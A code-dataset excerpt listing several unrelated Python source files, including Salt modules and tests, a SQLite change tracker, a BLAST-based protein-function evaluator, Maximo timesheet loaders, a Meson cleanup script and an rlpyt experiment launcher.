filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_3664 | """
:codeauthor: Jayesh Kariya <[email protected]>
"""
import pytest
import salt.states.apache as apache
import salt.utils.files
from tests.support.mock import MagicMock, mock_open, patch
@pytest.fixture
def configure_loader_modules():
return {apache: {}}
def test_configfile():
"""
Test to allows for inputting a yaml dictionary into a file
for apache configuration files.
"""
with patch("os.path.exists", MagicMock(return_value=True)):
name = "/etc/distro/specific/apache.conf"
config = 'VirtualHost: this: "*:80"'
new_config = 'LiteralHost: that: "*:79"'
ret = {"name": name, "result": True, "changes": {}, "comment": ""}
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update({"comment": "Configuration is up to date."})
assert apache.configfile(name, config) == ret
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=new_config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update(
{
"comment": "Configuration will update.",
"changes": {"new": new_config, "old": config},
"result": None,
}
)
with patch.dict(apache.__opts__, {"test": True}):
assert apache.configfile(name, new_config) == ret
with patch.object(salt.utils.files, "fopen", mock_open(read_data=config)):
mock_config = MagicMock(return_value=new_config)
with patch.dict(apache.__salt__, {"apache.config": mock_config}):
ret.update(
{"comment": "Successfully created configuration.", "result": True}
)
with patch.dict(apache.__opts__, {"test": False}):
assert apache.configfile(name, config) == ret
|
the-stack_0_3665 | import os
from typing import List
import sqlite3
from datamodels import car
def setupNewDB(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
if os.path.isfile(dirpath + "/newdata.db"):
os.remove(dirpath + "/newdata.db")
newdb = sqlite3.connect(dirpath + "/newdata.db")
try:
newdb.execute(
"CREATE TABLE cars(id TEXT, title TEXT, url TEXT, price TEXT, img TEXT, cdata TEXT)"
)
except sqlite3.OperationalError:
print("Error setting up the database")
newdb.close()
quit()
return newdb
def insertResults(db, results):
for res in results:
db.execute(
"INSERT INTO cars VALUES (?,?,?,?,?,?)",
(res.listing_id, res.title, res.url, res.price, res.img, res.data),
)
db.commit()
def findChanges(dirpath, results: List[car]) -> List[car]:
changes = []
newIDs = list(map(lambda newresult: newresult.listing_id, results))
if not os.path.isfile(dirpath + "/data.db"):
changes = list(map(lambda item: item.with_change_reasons("new"), results))
else:
olddb = sqlite3.connect(dirpath + "/data.db")
for currentCar in results:
oldres = olddb.execute(
"SELECT * from cars WHERE id=?", [currentCar.listing_id]
).fetchone()
if oldres is not None:
oldcar = car(*oldres)
if oldcar != currentCar:
changes.append(
currentCar.with_change_reasons(
'changed',
currentCar.diffFromOld(oldcar),
)
)
else:
changes.append(currentCar.with_change_reasons('new'))
oldCarData = olddb.execute("SELECT * from cars").fetchall()
oldCars = list(map(lambda tpl: car(*tpl), oldCarData))
for oldCar in oldCars:
if oldCar.listing_id not in newIDs:
changes.append(oldCar.with_change_reasons("deleted"))
olddb.close()
return changes
def archiveDatabase(dirpath):
if os.path.isfile(dirpath + "/data.db"):
os.remove(dirpath + "/data.db")
os.rename(dirpath + "/newdata.db", dirpath + "/data.db")
|
the-stack_0_3669 | '''
Support for Tomcat
'''
# Import Python Libs
import os
def __catalina_home():
'''
Tomcat paths differ depending on packaging
'''
locations = ['/usr/share/tomcat6', '/opt/tomcat']
for location in locations:
if os.path.isdir(location):
return location
def version():
'''
Return server version from catalina.sh version
CLI Example::
salt '*' tomcat.version
'''
cmd = __catalina_home() + '/bin/catalina.sh version'
out = __salt__['cmd.run'](cmd).splitlines()
for line in out:
if not line:
continue
if 'Server version' in line:
comps = line.split(': ')
return comps[1]
def fullversion():
'''
Return all server information from catalina.sh version
CLI Example::
salt '*' tomcat.fullversion
'''
cmd = __catalina_home() + '/bin/catalina.sh version'
ret = {}
out = __salt__['cmd.run'](cmd).splitlines()
for line in out:
if not line:
continue
if ': ' in line:
comps = line.split(': ')
ret[comps[0]] = comps[1]
return ret
def signal(signal=None):
'''
Signals catalina to start, stop, securestart, forcestop.
CLI Example::
salt '*' tomcat.signal start
'''
valid_signals = {'forcestop': 'stop -force',
'securestart': 'start -security',
'start': 'start',
'stop': 'stop'}
if not valid_signals[signal]:
return
cmd = '{0}/bin/catalina.sh {1}'.format(
__catalina_home(), valid_signals[signal]
)
__salt__['cmd.run'](cmd)
|
the-stack_0_3675 | import os
import sys
import subprocess
from tqdm import tqdm
from Bio.Seq import Seq
from Bio import SeqIO, SearchIO
from Bio.SeqRecord import SeqRecord
from Bio.Blast.Applications import NcbiblastpCommandline
from src.python.preprocess2 import *
from itertools import cycle
import matplotlib.pyplot as plt
from pymongo import MongoClient
from tempfile import gettempdir
tmp_dir = gettempdir()
from concurrent.futures import ThreadPoolExecutor
import argparse
ASPECT = 'F'
ONTO = None
PRIOR = None
THRESHOLDS = np.arange(.05, 1, .05)
cleanup = True
eps = 10e-6
def init_GO(asp=ASPECT, src=None):
global ONTO, ASPECT
if src: set_obo_src(src)
ASPECT = asp
ONTO = get_ontology(asp)
return ONTO
def add_arguments(parser):
parser.add_argument("--mongo_url", type=str, default='mongodb://localhost:27017/',
help="Supply the URL of MongoDB")
def load_all_data():
mf, _ = load_data(db, asp='F', codes=exp_codes)
cc, _ = load_data(db, asp='C', codes=exp_codes)
bp, _ = load_data(db, asp='P', codes=exp_codes)
return mf, cc, bp
def _prepare_naive(reference):
global PRIOR
prior_pth = os.path.join(tmp_dir, 'prior-%s.npy' % GoAspect(ASPECT))
if os.path.exists(prior_pth):
PRIOR = np.load(prior_pth).item()
go2count = {}
for _, go_terms in reference.items():
for go in go_terms:
if go in go2count:
go2count[go] += 1
else:
go2count[go] = 1
total = len(reference)
prior = {go: count/total for go, count in go2count.items()}
np.save(prior_pth, prior)
PRIOR = prior
def _naive(target, reference):
global PRIOR
if not PRIOR:
_prepare_naive(reference)
return PRIOR
def _prepare_blast(sequences):
# print('### entering _prepare_blast')
blastdb_pth = os.path.join(tmp_dir, 'blast-%s' % GoAspect(ASPECT))
records = [SeqRecord(Seq(seq), id) for id, seq in sequences.items()]
SeqIO.write(records, open(blastdb_pth, 'w+'), "fasta")
os.system("makeblastdb -in %s -dbtype prot" % blastdb_pth)
def parallel_blast(targets, reference, num_cpu=4):
blastdb_pth = os.path.join(tmp_dir, 'blast-%s' % GoAspect(ASPECT))
records = [SeqRecord(Seq(seq), id) for id, seq in reference.items()]
SeqIO.write(records, open(blastdb_pth, 'w+'), "fasta")
os.system("makeblastdb -in %s -dbtype prot" % blastdb_pth)
predictions = dict()
e = ThreadPoolExecutor(num_cpu)
def _parallel_blast_helper(s):
return s[0], _blast(SeqRecord(Seq(s[1]), s[0]), reference, topn=None, choose_max_prob=True)
pbar = tqdm(range(len(targets)), desc="blast2go processed")
for tgtid, preds in e.map(_parallel_blast_helper, targets.items()):
predictions[tgtid] = preds
pbar.update(1)
pbar.close()
return predictions
def _blast(target_fasta, reference, topn=None, choose_max_prob=True):
seqid, asp = target_fasta.id, GoAspect(ASPECT)
query_pth = os.path.join(tmp_dir, "%s-%s.fas" % (seqid, asp))
output_pth = os.path.join(tmp_dir, "%s-%s.out" % (seqid, asp))
database_pth = os.path.join(tmp_dir, 'blast-%s' % asp)
SeqIO.write(target_fasta, open(query_pth, 'w+'), "fasta")
cline = NcbiblastpCommandline(query=query_pth, db=database_pth, out=output_pth,
outfmt=5, evalue=0.001, remote=False, ungapped=False)
child = subprocess.Popen(str(cline),
stderr=subprocess.PIPE,
universal_newlines=True,
shell=(sys.platform != "win32"))
handle, _ = child.communicate()
assert child.returncode == 0
blast_qresult = SearchIO.read(output_pth, 'blast-xml')
annotations = {}
for hsp in blast_qresult.hsps[:topn]:
if hsp.hit.id == seqid:
continue
ident = hsp.ident_num / hsp.hit_span
for go in reference[hsp.hit.id]:
if go in annotations:
annotations[go].append(ident)
else:
annotations[go] = [ident]
for go, ps in annotations.items():
if choose_max_prob:
annotations[go] = max(ps)
else:
annotations[go] = 1 - np.prod([(1 - p) for p in ps])
if cleanup:
os.remove(query_pth)
os.remove(output_pth)
return annotations
def _predict(reference_annots, target_seqs, func_predict, binary_mode=False):
if len(target_seqs) > 1:
pbar = tqdm(range(len(target_seqs)), desc="targets processed")
else:
pbar = None
if binary_mode:
predictions = np.zeros((len(target_seqs), len(ONTO.classes)))
for i, (_, seq) in enumerate(target_seqs.items()):
preds = func_predict(seq, reference_annots)
bin_preds = ONTO.binarize([list(preds.keys())])[0]
for go, prob in preds.items():
bin_preds[ONTO[go]] = prob
predictions[i, :] = bin_preds
if pbar: pbar.update(1)
else:
predictions = {}
for _, (seqid, seq) in enumerate(target_seqs.items()):
predictions[seqid] = func_predict(SeqRecord(Seq(seq), seqid), reference_annots)
if pbar: pbar.update(1)
if pbar: pbar.close()
return predictions
def bin2dict(distribution, classes):
return {classes[i]: prob for i, prob in enumerate(distribution)}
def get_P_and_T_from_dictionaries(tau, predictions, targets):
assert len(predictions) == len(targets)
P, T = [], []
for seqid, seq_targets in targets.items():
assert len(seq_targets) > 0
seq_preds = predictions[seqid]
seq_annots = [go for go, prob in seq_preds.items() if prob >= tau]
P.append(set(seq_annots))
T.append(set(seq_targets))
assert len(P) == len(T)
return P, T
def get_P_and_T_from_arrays(tau, predictions, targets, classes):
assert len(predictions) == len(targets)
P, T = [], []
classes_arr = np.asarray(classes)
for prob_arr in map(lambda p: np.asarray(p), predictions):
annots = classes_arr[prob_arr >= tau]
P.append(set(annots))
for prob_arr in map(lambda t: np.asarray(t), targets):
annots = classes_arr[prob_arr == 1.0]
assert len(annots) == sum(prob_arr)
T.append(set(annots))
assert len(P) == len(T)
return P, T
def precision(tau, predictions, targets, classes=None):
assert type(predictions) == type(targets)
if isinstance(predictions, dict):
P, T = get_P_and_T_from_dictionaries(tau, predictions, targets)
else:
assert classes
P, T = get_P_and_T_from_arrays(tau, predictions, targets, classes)
ret = [(len(P_i & T_i) / len(P_i)) if len(P_i) else 1.0 for P_i, T_i in zip(P, T)]
return ret
def recall(tau, predictions, targets, classes=None, partial_evaluation=False):
assert type(predictions) == type(targets)
if isinstance(predictions, dict):
P, T = get_P_and_T_from_dictionaries(tau, predictions, targets)
else:
assert classes
P, T = get_P_and_T_from_arrays(tau, predictions, targets, classes)
if partial_evaluation:
P, T = zip(*[(P_i, T_i) for P_i, T_i in zip(P, T) if len(P_i) > 0])
ret = [(len(P_i & T_i) / len(T_i)) if len(P_i) else 0.0 for P_i, T_i in zip(P, T)]
return ret
def F_beta(pr, rc, beta=1):
pr = max(pr, eps)
rc = max(rc, eps)
return (1 + beta ** 2) * ((pr * rc) / (((beta ** 2) * pr) + rc))
def F1(pr, rc):
return F_beta(pr, rc, beta=1)
def predict(reference_seqs, reference_annots, target_seqs, method, basename=""):
filename = "%s_%s.npy" % (method, basename)
if method == "blast":
pred_path = os.path.join(tmp_dir, filename)
if basename and os.path.exists(pred_path):
return np.load(pred_path).item()
_prepare_blast(reference_seqs)
predictions = _predict(reference_annots, target_seqs, _blast)
np.save(pred_path, predictions)
return predictions
elif method == "naive":
_prepare_naive(reference_annots)
predictions = _predict(reference_annots, target_seqs, _naive)
return predictions
elif method == "deepseq":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
elif method == "seq2go":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
elif method == "seq2go-proba":
pred_path = os.path.join(tmp_dir, filename)
return np.load(pred_path).item()
else:
print("Unknown method")
def performance(predictions, ground_truth, classes=None, ths=THRESHOLDS):
prs, rcs, f1s = [], [], []
for tau in ths:
pr_per_seq = precision(tau, predictions, ground_truth, classes)
rc_per_seq = recall(tau, predictions, ground_truth, classes)
pr_tau = np.mean(pr_per_seq)
rc_tau = np.mean(rc_per_seq)
prs.append(pr_tau)
rcs.append(rc_tau)
f1s.append(np.mean(F1(pr_tau, rc_tau)))
return ths, prs, rcs, f1s
def plot_precision_recall(perf):
# Plot Precision-Recall curve
lw, n = 2, len(perf)
methods = list(perf.keys())
prs = [v[1] for v in perf.values()]
rcs = [v[2] for v in perf.values()]
f1s = [v[3] for v in perf.values()]
colors = cycle(['red', 'blue', 'navy', 'turquoise', 'darkorange', 'cornflowerblue', 'teal'])
# Plot Precision-Recall curve for each class
plt.clf()
for i, color in zip(range(len(methods)), colors):
plt.plot(rcs[i], prs[i], color=color, lw=lw,
label='{0} (F_max = {1:0.2f})'
.format(methods[i], max(f1s[i])))
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title(GoAspect(ASPECT))
plt.legend(loc="lower right")
plt.show()
def evaluate_performance(db, methods, asp='F', train_and_validation_data=None, filename=None, plot=1):
onto = init_GO(asp)
if train_and_validation_data:
seqs_train, annots_train, seqs_valid, annots_valid = train_and_validation_data
else:
seqs_train, annots_train, seqs_valid, annots_valid = load_training_and_validation(db, None)
annots_train = propagate_labels(annots_train, onto, include_root=False)
annots_valid = propagate_labels(annots_valid, onto, include_root=False)
perf = {}
for meth in methods:
pred = predict(seqs_train, annots_train, seqs_valid, meth, filename)
perf[meth] = performance(pred, annots_valid)
if plot == 1:
plot_precision_recall(perf)
return pred, perf
def product_of_experts(*predictions):
def go2p2go2ps(go2p_arr):
go2ps = dict()
for go2p in go2p_arr:
for go, prob in go2p.items():
if go in go2ps:
go2ps[go].append(prob)
else:
go2ps[go] = [prob]
return go2ps
poe = dict()
for pred in predictions:
for seqid, go2prob in pred.items():
if seqid in poe:
poe[seqid].append(pred[seqid])
else:
poe[seqid] = [pred[seqid]]
for seqid, arr in poe.items():
poe[seqid] = go2p2go2ps(arr)
for seqid, go2prob in poe.items():
for go, ps in go2prob.items():
poe[seqid][go] = 1 - np.prod([(1 - p) for p in ps])
return poe
if __name__ == "__main__":
parser = argparse.ArgumentParser()
add_arguments(parser)
args = parser.parse_args()
client = MongoClient(args.mongo_url)
db = client['prot2vec']
lim = 100
init_GO(ASPECT)
t0 = datetime(2017, 1, 1, 0, 0)
t1 = datetime.utcnow()
seqs_train, annots_train, seqs_valid, annots_valid = load_training_and_validation(db, t0, t1, ASPECT, lim)
predictions_blast = predict(seqs_train, annots_train, seqs_valid, "blast")
ths, prs, rcs, f1s = performance(predictions_blast, annots_valid)
import json
print(json.dumps(predictions_blast, indent=1))
print(json.dumps(annots_valid, indent=1))
import pandas as pd
print(pd.DataFrame({"Threshold": ths, "Precision": prs, "Recall": rcs, "F1": f1s}).head(20))
print(len(seqs_train), len(seqs_valid), len(predictions_blast))
|
the-stack_0_3676 | import csv
from datetime import datetime, time
from decimal import Decimal
from openpyxl import load_workbook, Workbook
from employee.models import Employee
from .models import MaximoTicket, MaximoTimeRegister
import logging
logger = logging.getLogger(__name__)
__author__ = 'lberrocal'
def row_to_dictionary(excel_row, mappings):
data = dict()
for attribute, position in mappings.items():
data[attribute] = excel_row[position].value
return data
def parse_hours(str_hours):
parts = str_hours.split(':')
return Decimal(parts[0]) + Decimal(parts[1]) / 60
def parse_datetime_hours(hours):
return Decimal(hours.hour + hours.minute / 60.0)
def decimal_to_time(decimal_hours):
hour = int(decimal_hours)
minute = int((decimal_hours - int(decimal_hours)) * Decimal(60.0))
return time(hour, minute, 0)
class AbstractMaximoData(object):
LOAD_TICKETS = 'LOAD_TICKETS'
LOAD_TIME = 'LOAD_TIME'
LOAD_ALL = 'LOAD_ALL'
def __init__(self, stdout=None):
self.ticket_mappings = {'ticket_type': 0, 'number': 1, 'name': 2}
self.time_register_mappings = {'company_id': 0,
'regular_hours': 1,
'date': 3,
'username': 5,
'pay_rate': 7,
'wo_number': 8,
'ticket_type': 11,
'ticket_number': 12,
'description': 6}
self.stdout = stdout
def write(self, msg):
if self.stdout:
self.stdout.write(msg)
def _get_maximo_ticket_info(self, row):
ticket_type = row[self.time_register_mappings['ticket_type']]
if not isinstance(ticket_type, str):
ticket_type = ticket_type.value
if ticket_type not in [MaximoTicket.MAXIMO_SR]:
ticket_type = MaximoTicket.MAXIMO_WORKORDER
if ticket_type == MaximoTicket.MAXIMO_WORKORDER:
number = row[self.time_register_mappings['wo_number']]
else:
number = row[self.time_register_mappings['ticket_number']]
if not isinstance(number, str):
number = number.value
return ticket_type, number
class MaximoCSVData(AbstractMaximoData):
def _parse_date(self, str_date):
return datetime.strptime(str_date, '%b %d, %Y').date()
def load_time_registers(self, filename):
time_results = {'rows_parsed': 0,
'created': 0,
'duplicates': 0,
'sheet': 'NA',
'errors': list()}
row_num = 1
created_count = 0
updated = 0
duplicate_count = 0
errors = list()
with open(filename, 'r', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
next(csv_reader, None)
for row in csv_reader:
attributes = dict()
company_id = row[self.time_register_mappings['company_id']]
try:
attributes['employee'] = Employee.objects.get(company_id=company_id)
attributes['date'] = self._parse_date(row[self.time_register_mappings['date']])
regular_hours = parse_hours(row[self.time_register_mappings['regular_hours']])
if regular_hours > 8.0:
raise ValueError(
'Regular hours cannot exceed 8 hours. Your are trying to add %.1f hours' % regular_hours)
register_summary = MaximoTimeRegister.objects.get_employee_total_regular_hours(**attributes)
total_regular_hours = 0
if register_summary['total_regular_hours'] is not None:
total_regular_hours = register_summary['total_regular_hours']
if total_regular_hours + regular_hours <= 8.0:
attributes['pay_rate'] = Decimal(row[self.time_register_mappings['pay_rate']])
ticket_type, number = self._get_maximo_ticket_info(row)
attributes['ticket'] = MaximoTicket.objects.get(ticket_type=ticket_type, number=number)
attributes['regular_hours'] = regular_hours
attributes['defaults'] = {'description': row[self.time_register_mappings['description']]}
register, created = MaximoTimeRegister.objects.get_or_create(**attributes)
if created:
created_count += 1
else:
msg = 'Data on row %d for employee %s ' \
'seems to be duplicated for record %d' % (row_num, attributes['employee'],
register.pk)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Possible duplicate',
'message': msg}
errors.append(error)
duplicate_count += 1
else:
msg = 'Data on row %d for employee %s exceeds ' \
'the maximum regular hour. It would end up having %.1f hours' % (row_num,
attributes['employee'],
total_regular_hours + regular_hours)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Exceed maximum 8 regular hours',
'message': msg}
errors.append(error)
duplicate_count += 1
except Employee.DoesNotExist:
username = row[self.time_register_mappings['username']]
msg = 'Employee with id %s and username %s ' \
'on row %d does not exist time registe was not loaded' % (company_id, username, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Employee does not exist',
'message': msg}
errors.append(error)
except MaximoTicket.DoesNotExist:
msg = '%s with number %s on line %d does not exist' % (ticket_type, number, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Ticket does not exist',
'message': msg}
errors.append(error)
except TypeError as te:
msg = 'Unexpected error %s on row %d' % (te, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Unexeptected Type Error',
'message': msg}
errors.append(error)
except ValueError as ve:
msg = '%s on row %d' % (ve, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Value Error',
'message': msg}
errors.append(error)
row_num += 1
time_results['rows_parsed'] = row_num - 1
time_results['created'] = created_count
time_results['duplicates'] = duplicate_count
time_results['errors'] = errors
return time_results
class MaximoExcelData(AbstractMaximoData):
'''
The loading of Times is based on an export of a report name TINO-NS-FY16.
The columns are:
0 acp_empnum company_id
1 acp_hours regular_hours
2 acp_pagorelevo
3 acp_timingdate date
4 enterby
5 laborcode username
6 memo description
7 payrate pay_rate
8 refwo wo_number
9 regularhrs
10 skilllevel
11 ticketclass ticket_type
12 ticketid ticket_number
'''
def __init__(self, stdout=None):
super(MaximoExcelData, self).__init__(stdout=stdout)
self.ticket_sheet = 'Maximo Tickets'
self.time_sheet = 'Time'
def load(self, filename, action=AbstractMaximoData.LOAD_ALL, allow_update=False, **kwargs):
wb = load_workbook(filename=filename, data_only=True)
ticket_results = dict()
time_results = dict()
if action == self.LOAD_TICKETS:
ticket_results = self.load_tickets(wb, allow_update=allow_update, **kwargs)
elif action == self.LOAD_TIME:
time_results = self.load_time_registers(wb, allow_update=allow_update, **kwargs)
elif action is self.LOAD_ALL:
ticket_results = self.load_tickets(wb, allow_update=allow_update, **kwargs)
time_results = self.load_time_registers(wb, allow_update=allow_update, **kwargs)
else:
raise ValueError('"%s" is an invalid action for load' % action)
return {'ticket_results': ticket_results,
'time_results': time_results}
def save_tickets(self, filename, tickets):
wb = Workbook()
sheet = wb.create_sheet(title=self.ticket_sheet)
row = 1
for v, column in self.ticket_mappings.items():
sheet.cell(column=column + 1, row=row, value=v.upper())
row += 1
for ticket in tickets:
for v, column, in self.ticket_mappings.items():
sheet.cell(column=column + 1, row=row, value=getattr(ticket, v))
row += 1
wb.save(filename)
def export_time_registers(self, filename, registers):
wb = Workbook()
sheet = wb.create_sheet(title=self.time_sheet)
row = 1
headers = ['Company Id', 'Username', 'Date', 'Hours', 'Pay Rate',
'Ticket Type', 'Ticket Number', 'Ticket Name', 'Memo', 'Project', 'Project Source']
column = 1
for header in headers:
sheet.cell(column=column, row=row, value=header)
column += 1
for register in registers:
row += 1
column = 1
sheet.cell(column=column, row=row, value=register.employee.company_id)
column += 1
sheet.cell(column=column, row=row, value=register.employee.user.username)
column += 1
sheet.cell(column=column, row=row, value=register.date)
column += 1
sheet.cell(column=column, row=row, value=register.regular_hours)
column += 1
sheet.cell(column=column, row=row, value=register.pay_rate)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.ticket_type)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.number)
column += 1
sheet.cell(column=column, row=row, value=register.ticket.name)
column += 1
sheet.cell(column=column, row=row, value=register.description)
column += 1
if register.ticket.project:
project_name = register.ticket.project.short_name
else:
project_name=''
sheet.cell(column=column, row=row, value=project_name)
column += 1
sheet.cell(column=column, row=row, value='NA')
wb.save(filename)
def save_time_registers(self, filename, registers):
"""
Saves a queryset of MaximoTimeRegister objects to an excel format that matches the load file format. The load
file forma is explained at the class level documentacions
:param filename: Excel filename to save the MaximoTimeRegister
:param registers: QuerySet of MaximoTimeRegister
:return: None
"""
wb = Workbook()
sheet = wb.create_sheet(title=self.time_sheet)
row = 1
for v, column in self.time_register_mappings.items():
sheet.cell(column=column + 1, row=row, value=v.upper())
row += 1
for register in registers:
col = self.time_register_mappings['company_id'] + 1
sheet.cell(column=col, row=row, value=register.employee.company_id)
col = self.time_register_mappings['regular_hours'] + 1
hours = decimal_to_time(register.regular_hours)
sheet.cell(column=col, row=row, value=hours)
col = self.time_register_mappings['date'] + 1
sheet.cell(column=col, row=row, value=register.date)
col = self.time_register_mappings['username'] + 1
sheet.cell(column=col, row=row, value=register.employee.user.username)
col = self.time_register_mappings['pay_rate'] + 1
sheet.cell(column=col, row=row, value=register.pay_rate)
col = self.time_register_mappings['description'] + 1
sheet.cell(column=col, row=row, value=register.description)
if register.ticket.ticket_type == MaximoTicket.MAXIMO_WORKORDER:
col = self.time_register_mappings['wo_number'] + 1
sheet.cell(column=col, row=row, value=register.ticket.number)
if register.ticket.ticket_type != MaximoTicket.MAXIMO_WORKORDER:
col = self.time_register_mappings['ticket_type'] + 1
sheet.cell(column=col, row=row, value=register.ticket.ticket_type)
col = self.time_register_mappings['ticket_number'] + 1
sheet.cell(column=col, row=row, value=register.ticket.number)
row += 1
wb.save(filename)
def load_time_registers(self, wb, allow_update=False, **kwargs):
sheet_name = kwargs.get('Time', self.time_sheet)
time_sheet = wb[sheet_name]
time_results = {'rows_parsed': 0,
'created': 0,
'duplicates': 0,
'sheet': sheet_name,
'errors': list()}
row_num = 1
created_count = 0
updated = 0
duplicate_count = 0
errors = list()
for row in time_sheet.rows:
if row_num > 1:
attributes = dict()
company_id = row[self.time_register_mappings['company_id']].value
try:
attributes['employee'] = Employee.objects.get(company_id=company_id)
attributes['date'] = row[self.time_register_mappings['date']].value
regular_hours = parse_datetime_hours(row[self.time_register_mappings['regular_hours']].value)
if regular_hours > 8.0:
raise ValueError(
'Regular hours cannot exceed 8 hours. Your are trying to add %.1f hours' % regular_hours)
register_summary = MaximoTimeRegister.objects.get_employee_total_regular_hours(**attributes)
total_regular_hours = 0
if register_summary['total_regular_hours'] is not None:
total_regular_hours = register_summary['total_regular_hours']
if total_regular_hours + regular_hours <= 8.0:
attributes['pay_rate'] = Decimal(row[self.time_register_mappings['pay_rate']].value)
ticket_type, number = self._get_maximo_ticket_info(row)
attributes['ticket'] = MaximoTicket.objects.get(ticket_type=ticket_type, number=number)
attributes['regular_hours'] = regular_hours
attributes['defaults'] = {'description': row[self.time_register_mappings['description']].value}
register, created = MaximoTimeRegister.objects.get_or_create(**attributes)
if created:
created_count += 1
else:
msg = 'Data on row %d for employee %s ' \
'seems to be duplicated for record %d' % (row_num, attributes['employee'],
register.pk)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Possible duplicate',
'message': msg}
errors.append(error)
duplicate_count += 1
else:
msg = 'Data on row %d for employee %s exceeds ' \
'the maximum regular hour. It would end up having %.1f hours' % (row_num,
attributes['employee'],
total_regular_hours + regular_hours)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Exceed maximum 8 regular hours',
'message': msg}
errors.append(error)
duplicate_count += 1
except Employee.DoesNotExist:
username = row[self.time_register_mappings['username']].value
msg = 'Employee with id %s and username %s ' \
'on row %d does not exist time registe was not loaded' % (company_id, username, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Employee does not exist',
'message': msg}
errors.append(error)
except MaximoTicket.DoesNotExist:
msg = '%s with number %s on line %d does not exist' % (ticket_type, number, row_num)
logger.warn(msg)
error = {'row_num': row_num,
'type': 'Ticket does not exist',
'message': msg}
errors.append(error)
except TypeError as te:
msg = 'Unexpected error %s on row %d' % (te, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Unexeptected Type Error',
'message': msg}
errors.append(error)
except ValueError as ve:
msg = '%s on row %d' % (ve, row_num)
logger.error(msg)
error = {'row_num': row_num,
'type': 'Value Error',
'message': msg}
errors.append(error)
row_num += 1
time_results['rows_parsed'] = row_num - 2
time_results['created'] = created_count
time_results['duplicates'] = duplicate_count
time_results['sheet'] = sheet_name
time_results['errors'] = errors
return time_results
def load_tickets(self, wb, allow_update=False, **kwargs):
sheet_name = kwargs.get('ticket_sheet', self.ticket_sheet)
ticket_sheet = wb[sheet_name]
results = {'rows_parsed': 0,
'created': 0,
'updated': 0,
'sheet': sheet_name}
row_num = 1
created_count = 0
updated = 0
for row in ticket_sheet.rows:
if row_num > 1:
data_dictionary = row_to_dictionary(row, self.ticket_mappings)
obj, created = MaximoTicket.objects.get_or_create(ticket_type=data_dictionary['ticket_type'],
number=data_dictionary['number'],
defaults=data_dictionary)
if created:
self.write('%d Created Maximo ticket %s' % (row_num - 1, obj))
logger.debug('%d Created Maximo ticket %s' % (row_num - 1, obj))
created_count += 1
# logger.debug('--- %d tickets created' % created)
elif allow_update:
self.write('%d Update Maximo ticket %s' % (row_num - 1, obj))
logger.debug('%d Update Maximo ticket %s' % (row_num - 1, obj))
updated += 1
else:
logger.debug('%d Existed Maximo ticket %s' % (row_num - 1, obj))
row_num += 1
# logger.debug('%d tickets created' % created)
results = {'rows_parsed': row_num - 2,
'created': created_count,
'updated': updated,
'sheet': sheet_name}
return results
|
the-stack_0_3677 | # Copyright 2016 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import shutil
import pickle
import typing as T
def rmtrees(build_dir: str, trees: T.List[str]) -> None:
for t in trees:
# Never delete trees outside of the builddir
if os.path.isabs(t):
print(f'Cannot delete dir with absolute path {t!r}')
continue
bt = os.path.join(build_dir, t)
# Skip if it doesn't exist, or if it is not a directory
if os.path.isdir(bt):
shutil.rmtree(bt, ignore_errors=True)
def run(args: T.List[str]) -> int:
if len(args) != 1:
print('Cleaner script for Meson. Do not run on your own please.')
print('cleantrees.py <data-file>')
return 1
with open(args[0], 'rb') as f:
data = pickle.load(f)
rmtrees(data.build_dir, data.trees)
# Never fail cleaning
return 0
if __name__ == '__main__':
run(sys.argv[1:])
|
the-stack_0_3679 | import copy
import sys
from rlpyt.utils.launching.affinity import encode_affinity, quick_affinity_code
from rlpyt.utils.launching.exp_launcher import run_experiments
from rlpyt.utils.launching.variant import VariantLevel, make_variants
args = sys.argv[1:]
assert len(args) == 2
my_computer = int(args[0])
num_computers = int(args[1])
print(f"MY_COMPUTER: {my_computer}, NUM_COMPUTERS: {num_computers}")
script = (
"rlpyt/ul/experiments/rl_from_ul/scripts/atari/train/atari_ppo_from_ul_serial.py"
)
affinity_code = quick_affinity_code(contexts_per_gpu=3)
runs_per_setting = 3
experiment_title = "ppo_from_atc_1"
variant_levels_1 = list()
variant_levels_2 = list()
# variant_levels_3 = list()
learning_rates = [1e-3]
values = list(zip(learning_rates))
dir_names = ["{}lr".format(*v) for v in values]
keys = [("pretrain", "learning_rate")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# games = ["pong", "qbert", "seaquest", "space_invaders",
# "alien", "breakout", "frostbite", "gravitar"]
games = ["alien", "frostbite", "pong", "seaquest"]
values = list(zip(games))
dir_names = games
keys = [("env", "game")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
# variant_levels_3.append(VariantLevel(keys, values, dir_names))
##################################################
# RL CONFIG (mostly)
n_steps = [25e6]
pretrain_algos = ["ATC"]
replays = ["20200608/15M_VecEps_B78"]
